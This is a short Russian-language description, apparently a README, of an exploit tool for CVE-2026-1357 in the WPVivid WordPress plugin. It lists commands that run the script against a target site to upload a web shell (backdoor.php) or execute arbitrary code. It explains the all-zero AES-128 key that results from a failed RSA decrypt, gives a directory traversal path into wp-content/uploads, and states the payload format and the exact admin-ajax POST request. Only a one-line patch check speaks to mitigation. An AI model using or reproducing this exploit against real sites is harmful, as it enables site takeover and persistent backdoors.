
Эксплойт для CVE-2026-1357 в плагине WordPress WPVivid, позволяющий удалённое выполнение кода через специально сформированные AES-зашифрованные полезные нагрузки и обход каталога для загрузки веб-шелла.
pip3 install pycryptodome requests
python3 wpvivi.py http://target.com
python3 wpvivi.py http://target.com --shell backdoor.php
python3 wpvivi.py http://target.com --code "" Техническое объяснение: Null Byte Key: Когда RSA decrypt завершается неудачей, возвращается false, который phpseclib обрабатывает как "\x00\x00\x00". Мы используем 16 нулевых байтов в качестве ключа AES-128 ECB. Directory Traversal: Имя файла не санитизируется, что позволяет использовать ../../../../wp-content/uploads/shell.php Формат полезной нагрузки:
[len_key_hex(2 байта)] + [key_hex] + [len_data_hex(16 байтов)] + [encrypted_data] Выполнение: POST на /wp-admin/admin-ajax.php?action=wpvivid_action&wpvivid_action=send_to_site wpvivid_content = base64(зашифрованная полезная нагрузка) Обнаружение и смягчение:
Исправлено в 0.9.124:
if ($key === false || empty($key)) return false;